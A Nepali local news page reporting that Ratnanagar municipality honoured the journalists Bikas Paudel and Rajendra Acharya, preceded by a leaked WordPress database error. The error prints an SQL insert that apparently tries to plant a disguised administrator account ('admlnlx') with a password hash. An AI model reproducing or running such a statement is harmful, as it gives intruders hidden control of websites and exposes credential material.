WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCFxKBVMcHldnr5NMypGUerU.8l7qZ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 21:58:05', '', 'admlnlx', 'admlnlx')
चितवन ,पुस २८ –
चितवनका युवा पत्रकार बिकास पौडेल सम्मानित भएका छन् । रत्ननगर नगरपालिकाले आफ्नो २१ औ नगरपरिषदको अवसरमा पौडेललाई नगद सहित सम्मान गरेको हो । पत्रकारिता क्षेत्रमा क्रियाशिल रहि नगरको बिकासमा योगदान पुर्यााएको भन्दै पौडेललाई सम्मान गरेको थियो ।पौडेल नारायणी अनलाइन र एविसी टेलिभिजनमा कार्यरत छन् ।
पौडेलसंगै पत्रकार राजेन्द आचार्य पनि सम्मानित भएका छन् । पत्रकारद्वयलाई नगरपालिकाका कार्यकारि अधिकृत काशीराम गैरे र कार्यक्रमका प्रमुख अतिथि चितवन क्षेत्र न २ का सासद शेषनाथ अधिकारिले सम्मान गरेका हुन् ।